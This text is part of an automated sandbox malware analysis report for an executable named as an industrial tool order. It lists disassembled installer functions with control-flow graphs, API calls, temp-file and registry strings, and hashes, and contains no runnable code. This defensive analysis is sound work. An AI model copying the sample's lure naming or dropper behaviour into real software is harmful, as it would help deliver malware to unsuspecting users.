                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 837 4053dc-405427 CreateDirectoryA 838 405429-40542b 837->838 839 40542d-40543a GetLastError 837->839 840 405454-405456 838->840 839->840 841 40543c-405450 SetFileSecurityA 839->841 841->838 842 405452 GetLastError 841->842 842->840
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040541F
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405433
                                                                                                                                                                                                                          • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405448
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405452
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                                          • String ID: ,s@$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                                                                                                                                                          • API String ID: 3449924974-3660268831
                                                                                                                                                                                                                          • Opcode ID: c1937cb38bbd103373e168b49ea038f7d2b8a7083c118a1d29bd15b4f0e45592
                                                                                                                                                                                                                          • Instruction ID: 949b07086bfbcc12ad21f83970ad7e8279e58ae06bb45438fc5c1603e332b0fc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1937cb38bbd103373e168b49ea038f7d2b8a7083c118a1d29bd15b4f0e45592
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D010871D14259EADF119BA0DD447EFBFB8EB04355F004176E904B6181E3789648CFAA
                                                                                                                                                                                                                          Function 00402E9F Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 843 402e9f-402eb3 844 402eb5 843->844 845 402ebc-402ec4 843->845 844->845 846 402ec6 845->846 847 402ecb-402ed0 845->847 846->847 848 402ee0-402eed call 40307b 847->848 849 402ed2-402edb call 403091 847->849 853 403032 848->853 854 402ef3-402ef7 848->854 849->848 855 403034-403035 853->855 856 40301b-40301d 854->856 857 402efd-402f1d GetTickCount call 406175 854->857 858 403074-403078 855->858 859 403066-40306a 856->859 860 40301f-403022 856->860 867 403071 857->867 868 402f23-402f2b 857->868 863 403037-40303d 859->863 864 40306c 859->864 865 403024 860->865 866 403027-403030 call 40307b 860->866 870 403042-403050 call 40307b 863->870 871 40303f 863->871 864->867 865->866 866->853 876 40306e 866->876 867->858 872 402f30-402f3e call 40307b 868->872 873 402f2d 868->873 870->853 880 403052-40305e call 405a17 870->880 871->870 872->853 881 402f44-402f4d 872->881 873->872 876->867 886 403060-403063 880->886 887 403017-403019 880->887 883 402f53-402f70 call 406195 881->883 889 403013-403015 883->889 890 402f76-402f8d GetTickCount 883->890 886->859 887->855 889->855 891 402fd2-402fd4 890->891 892 402f8f-402f97 890->892 893 402fd6-402fda 891->893 894 403007-40300b 891->894 895 402f99-402f9d 892->895 896 402f9f-402fca MulDiv wsprintfA call 404f16 892->896 897 402fdc-402fe1 call 405a17 893->897 898 402fef-402ff5 893->898 894->868 899 403011 894->899 895->891 895->896 903 402fcf 896->903 904 402fe6-402fe8 897->904 902 402ffb-402fff 898->902 899->867 902->883 905 403005 902->905 903->891 904->887 906 402fea-402fed 904->906 905->867 906->902
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$wsprintf
                                                                                                                                                                                                                          • String ID: ... %d%%
                                                                                                                                                                                                                          • API String ID: 551687249-2449383134
                                                                                                                                                                                                                          • Opcode ID: 6f3418d20d5a7b16bbf07f2caf8b388666ee65f0263a646cde66ce9cfbfa83ed
                                                                                                                                                                                                                          • Instruction ID: 7e4dc47457cc3da2c56257e898c37067349407ab53618b81eea50406b68a50e3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f3418d20d5a7b16bbf07f2caf8b388666ee65f0263a646cde66ce9cfbfa83ed
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9517C72902219ABDF10DF65DA04A9F7BB8EB40755F14413BF800B72C4C7789E51DBAA
                                                                                                                                                                                                                          Function 00402364 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 907 402364-4023aa call 402b2f call 402a3a * 2 RegCreateKeyExA 914 4023b0-4023b8 907->914 915 4028cf-4028de 907->915 917 4023c8-4023cb 914->917 918 4023ba-4023c7 call 402a3a lstrlenA 914->918 921 4023db-4023de 917->921 922 4023cd-4023da call 402a1d 917->922 918->917 925 4023e0-4023ea call 402e9f 921->925 926 4023ef-402403 RegSetValueExA 921->926 922->921 925->926 928 402405 926->928 929 402408-4024de RegCloseKey 926->929 928->929 929->915 932 4026a6-4026ad 929->932 932->915
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz3421.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                                                                                                                                                                                                          • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsz3421.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
                                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsz3421.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateValuelstrlen
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsz3421.tmp
                                                                                                                                                                                                                          • API String ID: 1356686001-2647695323
                                                                                                                                                                                                                          • Opcode ID: e46d98766fca384b0b429333aaa9b9cfca7b69a45cfa3caf0dfdbd84f9289746
                                                                                                                                                                                                                          • Instruction ID: 133b3897f1a97e650f74ae2c97eeacc267919fe8998a33790bec377d3be5ae35
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e46d98766fca384b0b429333aaa9b9cfca7b69a45cfa3caf0dfdbd84f9289746
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F61163B1E00108BFEB10AFA4DE89EAF7A79EB54358F10403AF505B61D1D6B85D419A28
                                                                                                                                                                                                                          Function 00406028 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34libraryCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 933 406028-406048 GetSystemDirectoryA 934 40604a 933->934 935 40604c-40604e 933->935 934->935 936 406050-406058 935->936 937 40605e-406060 935->937 936->937 938 40605a-40605c 936->938 939 406061-40608f wsprintfA LoadLibraryA 937->939 938->939
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040603F
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00406078
                                                                                                                                                                                                                          • LoadLibraryA.KERNELBASE(?), ref: 00406088
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                                          • String ID: %s%s.dll$\
                                                                                                                                                                                                                          • API String ID: 2200240437-500877883
                                                                                                                                                                                                                          • Opcode ID: 1d5f31d115a59bc75170d0b5e25867174e87b8d420fe74ce0eee88fcfc4f8209
                                                                                                                                                                                                                          • Instruction ID: d5163558ffe5aed4278454506076ff52b4f001f8688a9739bf5e409abac40a62
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d5f31d115a59bc75170d0b5e25867174e87b8d420fe74ce0eee88fcfc4f8209
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6F0BB7094010A9BDF15DB78DC0DEFB365CEB08304F14057AA547E10D2EA79E975CBA9
                                                                                                                                                                                                                          Function 0040599F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 940 40599f-4059a9 941 4059aa-4059d5 GetTickCount GetTempFileNameA 940->941 942 4059e4-4059e6 941->942 943 4059d7-4059d9 941->943 945 4059de-4059e1 942->945 943->941 944 4059db 943->944 944->945
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 004059B3
                                                                                                                                                                                                                          • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059CD
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004059A2
                                                                                                                                                                                                                          • "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe", xrefs: 0040599F
                                                                                                                                                                                                                          • nsa, xrefs: 004059AA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                                                          • API String ID: 1716503409-3165751043
                                                                                                                                                                                                                          • Opcode ID: 95c6d3479798503f7923504534165061c55f320a4664c3ca80cf9d12d42afe18
                                                                                                                                                                                                                          • Instruction ID: 3f05255bf470524d05267fbe77a66a547c73f63e6c4f6eb4cae2c62e5f282410
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95c6d3479798503f7923504534165061c55f320a4664c3ca80cf9d12d42afe18
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3F0E272708204ABEB108F55EC04B9B7B9CDF91720F10803BFA08DA180D2B098108BA9
                                                                                                                                                                                                                          Function 100016BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 946 100016bd-100016f9 call 10001a5d 950 1000180a-1000180c 946->950 951 100016ff-10001703 946->951 952 10001705-1000170b call 100021b0 951->952 953 1000170c-10001719 call 100021fa 951->953 952->953 958 10001749-10001750 953->958 959 1000171b-10001720 953->959 962 10001770-10001774 958->962 963 10001752-1000176e call 100023da call 10001559 call 10001266 GlobalFree 958->963 960 10001722-10001723 959->960 961 1000173b-1000173e 959->961 965 10001725-10001726 960->965 966 1000172b-1000172c call 100027e8 960->966 961->958 969 10001740-10001741 call 10002aa3 961->969 967 100017b2-100017b8 call 100023da 962->967 968 10001776-100017b0 call 10001559 call 100023da 962->968 987 100017b9-100017bd 963->987 971 10001733-10001739 call 10002589 965->971 972 10001728-10001729 965->972 978 10001731 966->978 967->987 968->987 981 10001746 969->981 986 10001748 971->986 972->958 972->966 978->981 981->986 986->958 988 100017fa-10001801 987->988 989 100017bf-100017cd call 100023a0 987->989 988->950 994 10001803-10001804 GlobalFree 988->994 996 100017e5-100017ec 989->996 997 100017cf-100017d2 989->997 994->950 996->988 999 100017ee-100017f9 call 100014e2 996->999 997->996 998 100017d4-100017dc 997->998 998->996 1000 100017de-100017df FreeLibrary 998->1000 999->988 1000->996
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                                                                                                                                                                            • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                                                                                                                                                                            • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001768
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 100017DF
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                                                                                                                                            • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
                                                                                                                                                                                                                            • Part of subcall function 10002589: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FB
                                                                                                                                                                                                                            • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1507773811.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507731690.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507814859.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507849586.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1791698881-3916222277
                                                                                                                                                                                                                          • Opcode ID: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
                                                                                                                                                                                                                          • Instruction ID: 7bd52774c71d274dd6e07030a7ef65efb9a892d3f5f2eddd47f658e3267813e4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5319C79408205DAFB41DF649CC5BCA37ECFF042D5F018465FA0A9A09EDF78A8858B60
                                                                                                                                                                                                                          Function 0040585D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00405CFD: lstrcpynA.KERNEL32(?,?,00000400,0040318B,00422F20,NSIS Error), ref: 00405D0A
                                                                                                                                                                                                                            • Part of subcall function 00405808: CharNextA.USER32(?,?,Unconsiderately97.gra,?,00405874,Unconsiderately97.gra,Unconsiderately97.gra,766B3410,?,C:\Users\user\AppData\Local\Temp\,004055BF,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405816
                                                                                                                                                                                                                            • Part of subcall function 00405808: CharNextA.USER32(00000000), ref: 0040581B
                                                                                                                                                                                                                            • Part of subcall function 00405808: CharNextA.USER32(00000000), ref: 0040582F
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(Unconsiderately97.gra,00000000,Unconsiderately97.gra,Unconsiderately97.gra,766B3410,?,C:\Users\user\AppData\Local\Temp\,004055BF,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B0
                                                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(Unconsiderately97.gra,Unconsiderately97.gra,Unconsiderately97.gra,Unconsiderately97.gra,Unconsiderately97.gra,Unconsiderately97.gra,00000000,Unconsiderately97.gra,Unconsiderately97.gra,766B3410,?,C:\Users\user\AppData\Local\Temp\,004055BF,?,766B3410,C:\Users\user\AppData\Local\Temp\), ref: 004058C0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$Unconsiderately97.gra
                                                                                                                                                                                                                          • API String ID: 3248276644-424640219
                                                                                                                                                                                                                          • Opcode ID: cb887608a337bef365f075dbf4ed65c84e1b2a1d2ee6f30722e64456f73e84bd
                                                                                                                                                                                                                          • Instruction ID: 909c8d3fd404249b72f59da3ca6e13a8b26d043f1499ff833ea169d8e7c403dc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb887608a337bef365f075dbf4ed65c84e1b2a1d2ee6f30722e64456f73e84bd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FCF02823104D6121D63632361C05EAF1A84CD87364B28813BFC51B12D1CA3CC863DD7E
                                                                                                                                                                                                                          Function 00401F90 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNELBASE(00000000,?,000000F0), ref: 00401FBB
                                                                                                                                                                                                                            • Part of subcall function 00404F16: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,00000000,0040E8D8,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4F
                                                                                                                                                                                                                            • Part of subcall function 00404F16: lstrlenA.KERNEL32(00402FCF,Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,00000000,0040E8D8,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5F
                                                                                                                                                                                                                            • Part of subcall function 00404F16: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,00402FCF,00402FCF,Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,00000000,0040E8D8,00000000), ref: 00404F72
                                                                                                                                                                                                                            • Part of subcall function 00404F16: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll), ref: 00404F84
                                                                                                                                                                                                                            • Part of subcall function 00404F16: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                            • Part of subcall function 00404F16: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FC4
                                                                                                                                                                                                                            • Part of subcall function 00404F16: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FD2
                                                                                                                                                                                                                          • LoadLibraryExA.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 00401FCB
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,?,000000F0), ref: 00402045
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2987980305-0
                                                                                                                                                                                                                          • Opcode ID: 3b081aef81ff629f146bbe59bed4ce20841918d67cbec0e6b9b54e24ec9e4470
